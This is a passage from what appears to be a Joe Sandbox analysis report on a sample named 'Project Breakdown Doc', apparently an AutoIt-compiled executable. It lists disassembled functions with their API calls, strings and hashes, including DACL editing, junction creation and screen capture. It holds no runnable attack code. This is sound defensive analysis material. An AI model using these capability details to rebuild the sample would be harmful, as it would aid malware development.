                                                  • CharUpperBuffW.USER32(?,?), ref: 00CC46AB
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC46F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: 8bf565ff535d5a5431766cd5a04ad8ef0b6a2394622c13379eb49b331aca1793
                                                  • Instruction ID: 1be549af0d377ba252cbf024508e56abc6003114bcb1c2024f35443ec0acd260
                                                  • Opcode Fuzzy Hash: 8bf565ff535d5a5431766cd5a04ad8ef0b6a2394622c13379eb49b331aca1793
                                                  • Instruction Fuzzy Hash: D9915D746047159BCB18EF10C461B6EB7A5FF94314F14845CF8966B7A2CB30ED4AEB82
                                                  Function 00CCBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CCBB6E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CC6D80,?), ref: 00CCBBCA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCBC03
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CCBC46
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCBC7D
                                                  • FreeLibrary.KERNEL32(?), ref: 00CCBC89
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CCBC99
                                                  • DestroyIcon.USER32(?), ref: 00CCBCA8
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CCBCC5
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CCBCD1
                                                    • Part of subcall function 00C6313D: __wcsicmp_l.LIBCMT ref: 00C631C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: f51f4511684a2da0c627c016daae7b05a5e27d0b9a774641e049e5c77fceafab
                                                  • Instruction ID: ae4e62e5f7510b4a53a6d5cde063964881e15d9ab26c0976d2db6e761eb650ab
                                                  • Opcode Fuzzy Hash: f51f4511684a2da0c627c016daae7b05a5e27d0b9a774641e049e5c77fceafab
                                                  • Instruction Fuzzy Hash: 8461B171A00619BAEB14DFA4CC86FBE7BA8FB08711F104119F925D61D0DB75AE90DBA0
                                                  Function 00CAA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CAA636
                                                  • GetDriveTypeW.KERNEL32 ref: 00CAA683
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA6CB
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA702
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA730
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 41f6fc307a8005f5be00ac27bfe0ddfc38d46d05261c3e227e01f96c0194a7a4
                                                  • Instruction ID: 32d7e2bcd41a3184c0cf2aeeb50b306d6f58f426deade7e48b52e4adb095a4af
                                                  • Opcode Fuzzy Hash: 41f6fc307a8005f5be00ac27bfe0ddfc38d46d05261c3e227e01f96c0194a7a4
                                                  • Instruction Fuzzy Hash: A75139B51083059FC700EF20C88196BB7F4FF98718F14496DF89A972A1DB31AE0ADB52
                                                  Function 00CAA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CAA47A
                                                  • __swprintf.LIBCMT ref: 00CAA49C
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CAA4D9
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CAA4FE
                                                  • _memset.LIBCMT ref: 00CAA51D
                                                  • _wcsncpy.LIBCMT ref: 00CAA559
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CAA58E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CAA599
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00CAA5A2
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CAA5AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: f469af7a6cef0a45f35c32be7d550bb20b623da3b41ef4146df32e74285dd722
                                                  • Instruction ID: 64ddd05e21ee2f5dd136cc3f0e793109df387059cb0cf7a3085f6491903e86c7
                                                  • Opcode Fuzzy Hash: f469af7a6cef0a45f35c32be7d550bb20b623da3b41ef4146df32e74285dd722
                                                  • Instruction Fuzzy Hash: 68319DB190020AABDB219BA0DC48FEF73BDEF89705F1040BAFA18D2160E77097458B25
                                                  Function 00C7AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                  • String ID:
                                                  • API String ID: 884005220-0
                                                  • Opcode ID: 711c1c05ceb6d148bbc0d8f62c8f67417ae5cf8ba636b3eef10dc1b0d5afb139
                                                  • Instruction ID: 3c3989b5a413e526309893cc710e1960d5bbdb561f362f39d0e39eab94fa445e
                                                  • Opcode Fuzzy Hash: 711c1c05ceb6d148bbc0d8f62c8f67417ae5cf8ba636b3eef10dc1b0d5afb139
                                                  • Instruction Fuzzy Hash: EE612572900301AFDB215F64D842F6D77A5EF95321F14C215E829DB2D1DB35CA80D7A3
                                                  Function 00CADB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00CADC7B
                                                  • _wcscat.LIBCMT ref: 00CADC93
                                                  • _wcscat.LIBCMT ref: 00CADCA5
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CADCBA
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CADCCE
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00CADCE6
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CADD00
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CADD12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 1bfef278218f2bb6e06f8422533712604624296f165fd548d768b9244facce64
                                                  • Instruction ID: 429db7ce4d4bbb982ec139d85bc5dadef45e81fc9cc538a6e5d38ea4f895db0f
                                                  • Opcode Fuzzy Hash: 1bfef278218f2bb6e06f8422533712604624296f165fd548d768b9244facce64
                                                  • Instruction Fuzzy Hash: AD8194715043429FC724DF64C8859AAB7E4BB8A318F15882EF89BC7650E730DA45DB62
                                                  Function 00CCC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CCC4EC
                                                  • GetFocus.USER32 ref: 00CCC4FC
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00CCC507
                                                  • _memset.LIBCMT ref: 00CCC632
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CCC65D
                                                  • GetMenuItemCount.USER32(?), ref: 00CCC67D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00CCC690
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CCC6C4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CCC70C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CCC744
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CCC779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: e653af0fa6dfa29e93a22b9fd80b6abf792afff9bc6bc2b811ed630bd1dbdf1b
                                                  • Instruction ID: 2051b167af347123c88f57183d0813eb72c4fdc2ce428fd48530b06e89969398
                                                  • Opcode Fuzzy Hash: e653af0fa6dfa29e93a22b9fd80b6abf792afff9bc6bc2b811ed630bd1dbdf1b
                                                  • Instruction Fuzzy Hash: 2D814970608301AFDB10CF24C9C5F6BBBE9EB88314F00492DF9A997291D770DA55DBA2
                                                  Function 00C983F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                    • Part of subcall function 00C9874A: GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                    • Part of subcall function 00C9874A: GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                    • Part of subcall function 00C9874A: HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                    • Part of subcall function 00C987E7: GetProcessHeap.KERNEL32(00000008,00C98240,00000000,00000000,?,00C98240,?), ref: 00C987F3
                                                    • Part of subcall function 00C987E7: HeapAlloc.KERNEL32(00000000,?,00C98240,?), ref: 00C987FA
                                                    • Part of subcall function 00C987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98240,?), ref: 00C9880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C98458
                                                  • _memset.LIBCMT ref: 00C9846D
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9848C
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C9849D
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C984DA
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C984F6
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C98513
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C98522
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C98529
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9854A
                                                  • CopySid.ADVAPI32(00000000), ref: 00C98551
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98582
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C985A8
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C985BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 35d648f84094174a006ed9a0583073ffbe7ac928c945398af166b8f4070e8dbe
                                                  • Instruction ID: 851bbb74fbbf4cc809ac1af77d6b88049a1289f4b7260033459e4ddaeb952830
                                                  • Opcode Fuzzy Hash: 35d648f84094174a006ed9a0583073ffbe7ac928c945398af166b8f4070e8dbe
                                                  • Instruction Fuzzy Hash: 6C611971900209AFDF10DFA4DC49EAEBBB9FF05700F14816AF925A7291DB319A19DF60
                                                  Function 00CB762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00CB76A2
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CB76AE
                                                  • CreateCompatibleDC.GDI32(?), ref: 00CB76BA
                                                  • SelectObject.GDI32(00000000,?), ref: 00CB76C7
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CB771B
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CB7757
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CB777B
                                                  • SelectObject.GDI32(00000006,?), ref: 00CB7783
                                                  • DeleteObject.GDI32(?), ref: 00CB778C
                                                  • DeleteDC.GDI32(00000006), ref: 00CB7793
                                                  • ReleaseDC.USER32(00000000,?), ref: 00CB779E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: de87cde88544d4b11fd50611c47298d500b58a0fa79c418a0e045479631a80cd
                                                  • Instruction ID: db590cea3e2c6718440a5ede3adb83c77b40ec53053ea9b757fb50cb441c035f
                                                  • Opcode Fuzzy Hash: de87cde88544d4b11fd50611c47298d500b58a0fa79c418a0e045479631a80cd
                                                  • Instruction Fuzzy Hash: E0512875904209EFDB15CFA8CC89FEEBBB9EF48710F14852DF95AA7210D731A9418B60
                                                  Function 00CAA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00CCFB78), ref: 00CAA0FC
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CAA11E
                                                  • __swprintf.LIBCMT ref: 00CAA177
                                                  • __swprintf.LIBCMT ref: 00CAA190
                                                  • _wprintf.LIBCMT ref: 00CAA246
                                                  • _wprintf.LIBCMT ref: 00CAA264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: dc9794b6b00c4bd0069fc84310ee40ef9371094ba0df47b23fc3e038161e2fbd
                                                  • Instruction ID: 7aa95e77326b3b24a565a78980c42890ba9d6181ea214890caa306da369e9ee5
                                                  • Opcode Fuzzy Hash: dc9794b6b00c4bd0069fc84310ee40ef9371094ba0df47b23fc3e038161e2fbd
                                                  • Instruction Fuzzy Hash: 38515D7190021ABBCF15EBE0CD86EEEB779BF15300F100265F519A21A1EB316F59EB61
                                                  Function 00C46BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C60B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C46C6C,?,00008000), ref: 00C60BB7
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C46D0D
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C46E5A
                                                    • Part of subcall function 00C459CD: _wcscpy.LIBCMT ref: 00C45A05
                                                    • Part of subcall function 00C6387D: _iswctype.LIBCMT ref: 00C63885
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 388faec87d14c1a8a7eb8868656d0ed5690598129028c11b2c44f7536bb45e15
                                                  • Instruction ID: 2496d4c109fb4363b8009dbd7598286caa9c0e2901c17cd62274669bb717af5b
                                                  • Opcode Fuzzy Hash: 388faec87d14c1a8a7eb8868656d0ed5690598129028c11b2c44f7536bb45e15
                                                  • Instruction Fuzzy Hash: 97029F315083419FC724EF24C881AAFBBE5BF99314F14491DF49A972A2DB30DA49EB53
                                                  Function 00C445DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C445F9
                                                  • GetMenuItemCount.USER32(00D06890), ref: 00C7D7CD
                                                  • GetMenuItemCount.USER32(00D06890), ref: 00C7D87D
                                                  • GetCursorPos.USER32(?), ref: 00C7D8C1
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C7D8CA
                                                  • TrackPopupMenuEx.USER32(00D06890,00000000,?,00000000,00000000,00000000), ref: 00C7D8DD
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C7D8E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: fce837c269a22143c08cb89ce40482494ca9da637c8272d565f85ce6ad1ef864
                                                  • Instruction ID: fb3e1d2fa8c9dafd89870dff98c1bf19fbcb9b47e64651517cfddf9f0dddae74
                                                  • Opcode Fuzzy Hash: fce837c269a22143c08cb89ce40482494ca9da637c8272d565f85ce6ad1ef864
                                                  • Instruction Fuzzy Hash: A7711570601205BEEB249F25DC85FEABF75FF05368F208216F52AA61E0C7B16910DBA1
                                                  Function 00CC10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
